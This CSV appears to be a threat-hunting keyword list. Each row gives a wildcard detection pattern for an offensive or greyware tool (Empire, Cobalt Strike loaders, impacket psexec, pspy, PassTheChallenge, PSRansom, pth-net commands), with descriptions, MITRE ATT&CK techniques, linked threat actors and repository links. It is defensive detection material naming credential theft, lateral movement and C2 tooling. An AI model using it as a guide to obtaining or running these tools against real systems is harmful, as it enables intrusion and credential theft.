+"*ps2exe.ps1*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*ps2exe.psd1*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*ps2exe.psm1*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*PS2EXE-master*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*PSAmsiClient.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*PSAmsiScanner.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*PSAttack*","offensive_tool_keyword","PSAttack","PS>Attack combines some of the best projects in the infosec powershell community into a self contained custom PowerShell console. Its designed to make it easy to use PowerShell offensively and to evade antivirus and Incident Response teams. It does this with in a couple of ways.","T1059 - T1112 - T1055 - T1566","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/jaredhaight/PSAttack","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PSBits*NetShRun*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*PSByPassCLM*","offensive_tool_keyword","PSByPassCLM","Bypass for PowerShell Constrained Language Mode","T1027 - T1059 - T1218 - T1086 - T1089","TA0002 - TA0008 - TA0007","N/A","N/A","Defense Evasion","https://github.com/padovah4ck/PSByPassCLM","1","0","N/A","N/A","3","280","45","2021-12-23T16:29:01Z","2018-09-13T07:27:18Z" +"*psc4re/NSE-scripts*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*PSconfusion.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*pse2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ps-empire client*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*ps-empire server*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*ps-empire*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*psexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*PsExec[1].exe*","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*psexec_ms17_010.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*PSEXEC_PSH *","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","0","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" +"*PsExec64*","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*-PsExecCmd*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*PsExecLiveImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*PsExecMenu(*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*PSEXECSVC*","greyware_tool_keyword","psexec","PsExec is a legitimate Microsoft tool for remote administration. However. attackers can misuse it to execute malicious commands or software on other network machines. install persistent threats. and evade some security systems. ","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*PShlSpy*","signature_keyword","Antivirus Signature","highly revelant Antivirus signature. phishing tools","N/A","N/A","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*psinject * x64 Invoke-*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*psinject -PID*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*pslo *.ps1*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*PsLoggedon.exe*","greyware_tool_keyword","psloggedon","PsLoggedOn is an applet that displays both the locally logged on users and users logged on via resources for either the local computer. or a remote one","T1003 - T1049 - T1057 - T1082 - T1087 - T1518","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Reconnaissance","https://learn.microsoft.com/en-us/sysinternals/downloads/psloggedon","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*PsLoggedon64.exe*","greyware_tool_keyword","psloggedon","PsLoggedOn is an applet that displays both the locally logged on users and users logged on via resources for either the local computer. or a remote one","T1003 - T1049 - T1057 - T1082 - T1087 - T1518","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Reconnaissance","https://learn.microsoft.com/en-us/sysinternals/downloads/psloggedon","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*pSNIRFgTuZnCdHN*","offensive_tool_keyword","trevorc2","Command and Control via Legitimate Behavior over HTTP","T1105 - T1071 - T1070","TA0011","N/A","N/A","C2","https://github.com/trustedsec/trevorc2","1","0","N/A","10","10","1100","244","2022-01-31T20:16:24Z","2017-10-27T15:59:28Z" +"*PSObfucate.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*Pspersist-main*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" +"*PSprofile.cpp*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" +"*pspy*psscanner","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*pspy32 -*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*pspy64 -*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*pspy-build:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*pspy-development:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*pspy-example:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*pspy-master*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*pspy-testing:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*PSRansom.ps1*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","1","N/A","N/A","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z" +"*PSRecon*","offensive_tool_keyword","PSRecon","PSRecon gathers data from a remote Windows host using PowerShell (v2 or later). organizes the data into folders. hashes all extracted data. hashes PowerShell and various system properties. and sends the data off to the security team. The data can be pushed to a share. sent over email. or retained locally.","T1059 - T1003 - T1556 - T1204","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/gfoss/PSRecon","1","1","N/A","N/A","5","465","111","2017-07-29T15:03:04Z","2015-08-03T05:43:38Z" +"*psreflect *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*pstgdump.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*pstree.ps1*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*PSWtool*","signature_keyword","Antivirus Signature","highly revelant Antivirus signature. Programs classified as PSWTool can be used to view or restore forgotten often hidden passwords. They can also be used with malicious intent. even though the programs themselves have no malicious payload.","N/A","N/A","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PtC.exe challenge*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" +"*PtC.exe compare*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" +"*PtC.exe inject*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" +"*PtC.exe nthash *","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" +"*PtC.exe ping*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" +"*PtC.exe protect*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" +"*pth-net rpc group members *Domain admins*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pth-net rpc group members *Exchange Servers*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pth-net rpc password * -U * -S *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pth-net rpc user add * -U *-S *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 